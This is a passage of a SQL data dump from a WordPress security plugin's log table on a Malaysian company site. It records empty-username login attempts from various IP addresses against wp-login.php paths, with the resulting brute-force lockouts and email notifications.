15:13:51',19523408,20717488,'https://bintara.com.my/wp/wp-login.php',1,0,'167.114.118.135'),(26561,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY@cDDrcQxTmGrCWuaW7AAAAcc\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"144.217.80.190\";s:11:\"REMOTE_PORT\";s:5:\"39551\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY@cDDrcQxTmGrCWuaW7AAAAcc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078896.2587\";s:12:\"REQUEST_TIME\";s:10:\"1569078896\";}}','notice','2019-09-21 15:14:58','2019-09-21 15:14:56',19230280,20716800,'https://bintara.com.my/wordpress/wp-login.php',1,0,'144.217.80.190'),(26562,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:14:56\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:14:56\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:14:56\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:14:56\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:14:58','2019-09-21 15:14:56',19315200,20716800,'https://bintara.com.my/wordpress/wp-login.php',1,0,'144.217.80.190'),(26563,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:14:58','2019-09-21 15:14:56',19523384,20716800,'https://bintara.com.my/wordpress/wp-login.php',1,0,'144.217.80.190'),(26564,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY@g0nlR@6WyRVzpiDqiwAAAAE\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.55.177\";s:11:\"REMOTE_PORT\";s:5:\"56452\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY@g0nlR@6WyRVzpiDqiwAAAAE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078915.5006\";s:12:\"REQUEST_TIME\";s:10:\"1569078915\";}}','notice','2019-09-21 15:15:17','2019-09-21 15:15:15',19230248,20717944,'https://bintara.com.my/test/wp-login.php',1,0,'157.230.55.177'),(26565,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:15:15\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:15:15\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:15:15\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:15:15\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:15:17','2019-09-21 15:15:15',19314912,20717944,'https://bintara.com.my/test/wp-login.php',1,0,'157.230.55.177'),(26566,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:15:17','2019-09-21 15:15:15',19522352,20717944,'https://bintara.com.my/test/wp-login.php',1,0,'157.230.55.177'),(26567,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY@njDrcQxTmGrCWuaW8wAAAcY\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"103.5.150.16\";s:11:\"REMOTE_PORT\";s:5:\"40182\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY@njDrcQxTmGrCWuaW8wAAAcY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078942.8956\";s:12:\"REQUEST_TIME\";s:10:\"1569078942\";}}','notice','2019-09-21 15:15:44','2019-09-21 15:15:43',19230256,20718192,'https://bintara.com.my/2019/wp-login.php',1,0,'103.5.150.16'),(26568,0,'lockout','host-lockout::103.5.150.16','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:12:\"103.5.150.16\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:15:43\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:15:43\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:15:43\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:15:43\";s:12:\"lockout_host\";s:12:\"103.5.150.16\";}','action','2019-09-21 15:15:44','2019-09-21 15:15:43',19316016,20718192,'https://bintara.com.my/2019/wp-login.php',1,0,'103.5.150.16'),(26569,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:12:\"103.5.150.16\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:15:43\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:15:43\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:15:43\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:15:43\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:15:44','2019-09-21 15:15:43',19315992,20718192,'https://bintara.com.my/2019/wp-login.php',1,0,'103.5.150.16'),(26570,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:15:44','2019-09-21 15:15:43',19524048,20718192,'https://bintara.com.my/2019/wp-login.php',1,0,'103.5.150.16'),(26571,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY@3EnlR@6WyRVzpiDq4AAAABc\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"185.165.118.82\";s:11:\"REMOTE_PORT\";s:5:\"41018\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY@3EnlR@6WyRVzpiDq4AAAABc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079004.9222\";s:12:\"REQUEST_TIME\";s:10:\"1569079004\";}}','notice','2019-09-21 15:16:46','2019-09-21 15:16:45',19230288,20717768,'https://bintara.com.my/blog/wp-login.php',1,0,'185.165.118.82'),(26572,0,'lockout','host-lockout::185.165.118.82','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"185.165.118.82\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:16:45\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:16:45\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:16:45\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:16:45\";s:12:\"lockout_host\";s:14:\"185.165.118.82\";}','action','2019-09-21 15:16:46','2019-09-21 15:16:45',19315552,20717768,'https://bintara.com.my/blog/wp-login.php',1,0,'185.165.118.82'),(26573,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"185.165.118.82\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:16:45\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:16:45\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:16:45\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:16:45\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:16:46','2019-09-21 15:16:45',19315512,20717768,'https://bintara.com.my/blog/wp-login.php',1,0,'185.165.118.82'),(26574,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:16:46','2019-09-21 15:16:45',19523520,20717768,'https://bintara.com.my/blog/wp-login.php',1,0,'185.165.118.82'),(26575,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY@3XkXpgmG5P@iB8lGIwAAAJI\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"89.145.74.91\";s:11:\"REMOTE_PORT\";s:5:\"55809\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY@3XkXpgmG5P@iB8lGIwAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079005.2267\";s:12:\"REQUEST_TIME\";s:10:\"1569079005\";}}','notice','2019-09-21 15:16:46','2019-09-21 15:16:45',19228232,20717320,'https://bintara.com.my/blog/wp-login.php',1,0,'89.145.74.91'),(26576,0,'lockout','host-lockout::89.145.74.91','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:12:\"89.145.74.91\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:16:45\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:16:45\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:16:45\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:16:45\";s:12:\"lockout_host\";s:12:\"89.145.74.91\";}','action','2019-09-21 15:16:46','2019-09-21 15:16:45',19314008,20717320,'https://bintara.com.my/blog/wp-login.php',1,0,'89.145.74.91'),(26577,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:12:\"89.145.74.91\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:16:45\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:16:45\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:16:45\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:16:45\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:16:46','2019-09-21 15:16:45',19314024,20717320,'https://bintara.com.my/blog/wp-login.php',1,0,'89.145.74.91'),(26578,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:16:46','2019-09-21 15:16:45',19521872,20717320,'https://bintara.com.my/blog/wp-login.php',1,0,'89.145.74.91'),(26579,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 